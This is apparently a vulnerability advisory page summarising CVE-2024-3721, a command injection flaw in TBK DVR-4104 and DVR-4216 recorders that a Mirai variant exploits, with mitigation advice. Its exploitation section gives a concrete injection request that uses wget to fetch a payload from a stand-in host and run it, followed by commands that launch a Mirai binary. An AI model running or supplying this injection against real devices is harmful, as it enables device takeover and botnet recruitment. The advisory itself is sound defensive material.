TBK DVR: Critical OS command injection in TBK DVR-4104 and DVR-4216 via /device.rsp?opt=sys&cmd parameter (CVE-2024-3721) #shorts
Summary
Welcome to today’s podcast. We’re diving into CVE-2024-3721, a critical OS command injection vulnerability in TBK DVR devices that has been actively exploited by a new wave of the Mirai botnet. Our experts will break down what’s at stake and how you can protect your network.
Product details
The affected products are the TBK DVR-4104 and DVR-4216 digital video recorders running firmware versions up to 20240412. These devices expose an HTTP endpoint at /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ for system operations.
Vulnerability type summary
CVE-2024-3721 is classified under CWE-78: OS Command Injection. A flaw in input handling allows an attacker to inject arbitrary shell commands into the DVR’s operating system, leading to full remote compromise.
Details of the vulnerability
The issue lies in how the DVR processes the mdb and mdc parameters of the sys command endpoint. By supplying crafted payloads, an attacker can break out of expected parameters and execute system commands. The vulnerability is remotely exploitable over the network, and proof-of-concept code has been publicly released under VDB-260573. Kaspersky’s GReAT team has observed a new Mirai variant leveraging this flaw to build IoT botnets that launch DDoS attacks and propagate further via brute-forcing credentials.
Conclusion
To mitigate this threat, immediately update DVR firmware to a patched version from the vendor. Network-segment IoT devices, apply strict access controls, and monitor outbound traffic for unusual patterns. This incident underscores the importance of timely patching and robust network hygiene in defending against automated botnet campaigns.
Watch the full video on YouTube: CVE-2024-3721
Remediation and exploitation details
This chain involves the following actors
- Remote attacker: Scans for vulnerable devices and injects malicious commands
- Device administrator: Manages firmware and network access for TBK DVR devices
This following systems are involved
- TBK DVR-4104 (Digital video recorder for security camera streams): Target of operating system command injection
- TBK DVR-4216 (Digital video recorder for security camera streams): Target of operating system command injection
Attack entry point
- /device.rsp endpoint: Web management interface that processes opt=sys&cmd parameters
Remediation actions
Exploitation actions
Internet-wide port scan
- Use a scanning service to find devices responding on port 80 or 8080
Operating system command injection
- GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1;wget http://evil.example/payload.sh -O /tmp/payload.sh;sh /tmp/payload.sh
Remote shell execution
- sh /tmp/payload.sh
- chmod +x /tmp/mirai
- ./tmp/mirai
Botnet registration and control channel setup
- Initiate contact to a command-and-control server over TCP
- Start denial-of-service modules on the device
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://vuldb.com/?id.260573
- https://vuldb.com/?ctiid.260573
- https://vuldb.com/?submit.314969
- https://github.com/netsecfish/tbk_dvr_command_injection
- [2025-06-09] A new variant of the Mirai botnet exploits CVE-2024-3721 to target TBK DVR systems.
- [2025-06-06] Analysis of the latest Mirai wave targeting TBK DVR devices with CVE-2024-3721 by Kaspersky GReAT experts.
- [2025-06-06] Analysis of the latest Mirai wave targeting TBK DVR devices with CVE-2024-3721.